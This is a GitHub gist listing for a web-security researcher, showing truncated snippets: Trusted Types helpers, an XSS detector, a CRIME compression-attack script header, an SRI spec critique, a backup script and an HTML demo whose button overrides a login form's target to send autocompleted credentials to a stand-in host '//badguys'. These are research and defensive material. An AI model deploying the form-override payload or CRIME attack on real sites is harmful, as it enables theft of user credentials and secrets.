Krzysztof Kotowicz koto

koto / example.js
Last active Sep 3, 2019
Support for custom types in Trusted Type policies.
// Custom types for https://github.com/WICG/trusted-types/
// Allow a given TT policy to create custom unspoofable TrustedFoo instances.
const installFoo = (policy, rule, policyFactory) => {
const creatorSymbol = Symbol();
const map = new WeakMap();
// Some more defensive coding tricks can be applied here
// See https://github.com/WICG/trusted-types/blob/master/src/trustedtypes.js for inspiration.
class TrustedFoo {
koto / gist:50550bf1ab02c0de59acff51f8066202
Last active Sep 23, 2018
ZFF export screening times from your watchlist
// go to https://zff.com/en/community/users/me/watch-list/
https://github.com/wanasit/chrono
(function(f){if(typeof exports==="object"&&typeof module!=="undefined"){module.exports=f()}else if(typeof define==="function"&&define.amd){define([],f)}else{var g;if(typeof window!=="undefined"){g=window}else if(typeof global!=="undefined"){g=global}else if(typeof self!=="undefined"){g=self}else{g=this}g.chrono = f()}})(function(){var define,module,exports;return (function e(t,n,r){function s(o,u){if(!n[o]){if(!t[o]){var a=typeof require=="function"&&require;if(!u&&a)return a(o,!0);if(i)return i(o,!0);var f=new Error("Cannot find module '"+o+"'");throw f.code="MODULE_NOT_FOUND",f}var l=n[o]={exports:{}};t[o][0].call(l.exports,function(e){var n=t[o][1][e];return s(n?n:e)},l,l.exports,e,t,n,r)}return n[o].exports}var i=typeof require=="function"&&require;for(var o=0;o<r.length;o++)s(r[o]);return s})({1:[function(require,module,exports){
!function(e,d){"object"==typeof exports&&"undefined"!=typeof module&&"function"==ty
View angular 1.6 xss, no quotes,
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>JS Bin</title>
</head>
<body>
View gist:e52022050e2828ee40bb
/**
* Imports a public key to the key server.
* @param {!e2e.openpgp.block.TransferablePublicKey} key The ASCII
* armored or {e2e.openpgp.block.TransferablePublicKey} key to import.
* @return {!e2e.async.Result.<boolean>} True if importing the key succeeded.
*/
e2e.openpgp.KeyClient.prototype.importPublicKey = function(key) {
var uids = key.getUserIds();
if (uids.length != 1) {
View gist:8678570
http://w3c.github.io/webappsec/specs/subresourceintegrity/
issues:
"3.3.2 Is resource eligible for integrity validation
In order to mitigate an attackers ability to read data cross-origin by brute-forcing values via integrity checks, resources are only eligible for such checks if they are same-origin, publically cachable, or is the result of a granted the loading origin explicit access via CORS. [CORS] The following algorithm details these restrictions:"
Publicly cacheable != the attacker could read them anyway. For example, take cross-origin intranet resources: what if an intranet resource is publicly cacheable? The integrity check would still allow brute-forcing the body of that intranet resource from the internet (an SOP bypass).
View credtest.php
<html>
<a id=a href="http://<?php
$blacklist = ':@#"?`/\\';
for ($i = 33; $i < 255; $i++) {
if (strpos($blacklist, chr($i)) !== false) {
echo urlencode(chr($i));
} else
//echo urlencode(chr($i));
koto / xssdetect.js
Created Dec 1, 2012
reflected xss detection using xssauditor on phantomjs
// Script-level setup: create the page object from the `webpage` module and
// load the `system` module; `address` is declared here and left unassigned.
// NOTE(review): the gist description says detection relies on the XSS Auditor
// inside PhantomJS. That filter is heuristic, so a clean run is a triage
// signal rather than proof that a page has no reflected XSS, and PhantomJS
// itself is no longer maintained upstream.
var page = require('webpage').create();
var system = require('system');
var address;
page.onInitialized = function () {
page.evaluate(function () {
// additional detection code here perhaps
// f.e. detecting STORED/DOM XSS
});
koto / crime.py
Created Sep 11, 2012
It's not a crime to build a CRIME
# This is supposedly what CRIME by Juliano Rizzo and Thai Duong will do
# Algorithm by Thomas Pornin, coding by xorninja, improved by @kkotowicz
# http://security.blogoverflow.com/2012/09/how-can-you-protect-yourself-from-crime-beasts-successor/
import string
import zlib
import sys
import random
charset = string.letters + string.digits + "%/+="
koto / rsync_backup
Created Jan 16, 2012
OSX Snow Leopard bootable backup script with FileVault support (backup will be unencrypted!)
#!/bin/sh
PROG=$0
# use macports rsync 3.x - Apple's 2.6 hung on sockets
RSYNC="/opt/local/bin/rsync"
SRC="/"
DST="/Volumes/Backup/"
FILEVAULT_ACCT="Users/yourusername"
# rsync options
View gist:1502692
<!--
  Demonstration markup: a login form whose action is a same-origin URL, with a
  submit button that carries a per-button override attribute naming a different
  host (//badguys). The inline note below says the credential fields will
  probably be autocompleted by the browser.
  NOTE(review): defensive takeaway is to treat injected form controls as
  seriously as injected script. Restrict where forms may submit with the CSP
  `form-action` directive, and strip form-override attributes when sanitizing
  untrusted markup.
-->
<form action="//same-origin">
<input name=login>
<input name=password type=password>
.<!-- this will probably be autocompleted -->
<button type=submit form-action="//badguys">clickme</button>
</form>